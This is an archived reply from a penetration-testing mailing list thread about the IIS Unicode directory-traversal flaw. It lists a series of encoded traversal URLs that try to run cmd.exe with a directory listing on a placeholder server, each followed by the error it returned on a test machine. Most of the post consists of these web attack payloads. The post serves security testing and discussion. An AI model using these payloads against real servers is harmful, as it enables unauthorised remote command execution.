Penetration Testing mailing list archives

Re: [PEN-TEST] IIS UNICODE Strings

From: Erick Arturo Perez Huemer <eperez () grupotslc com>
Date: Mon, 30 Oct 2000 12:09:39 -0500


Testing this list on a Spanish NT 4.0 Sp6 machine reveals:


http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+d
ir+c:\
page not found (HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+d
ir+c:\
page not found(HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+d
ir+c:\
page not found(HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%c1%af../winnt/system32/cmd.exe?/c+d
ir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

http://address.of.iis5.system/scripts/..%c0%af../winnt/system32/cmd.exe?/c+d
ir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

http://address.of.iis5.system/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+d
ir+c:\
page not found(HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+d
ir+c:\
page not found(HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+d
ir+c:\
page not found(HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%e0%80%af../winnt/system32/cmd.exe?/
c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

http://address.of.iis5.system/scripts/..%f0%80%80%af../winnt/system32/cmd.ex
e?/c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

http://address.of.iis5.system/scripts/..%f8%80%80%80%af../winnt/system32/cmd
.exe?/c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

http://address.of.iis5.system/scripts/..%fc%80%80%80%80%af../winnt/system32/
cmd.exe?/c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

In our test, the InetPub directory is in logical drive D: instead of default
C:.
Does that matter in the above examples?


__________________________________________________
Do You Yahoo!?
Yahoo! Messenger - Talk while you surf!  It's FREE.
http://im.yahoo.com/

Attachment: Erick Arturo Perez.vcf
Description:

Current thread:

[PEN-TEST] IIS UNICODE Strings Mike Ahern (Oct 31)
- Re: [PEN-TEST] IIS UNICODE Strings Erick Arturo Perez Huemer (Oct 31)
- <Possible follow-ups>
- Re: [PEN-TEST] IIS UNICODE Strings Michael Owen (Oct 31)
- Re: [PEN-TEST] IIS UNICODE Strings Daniel Docekal (Oct 31)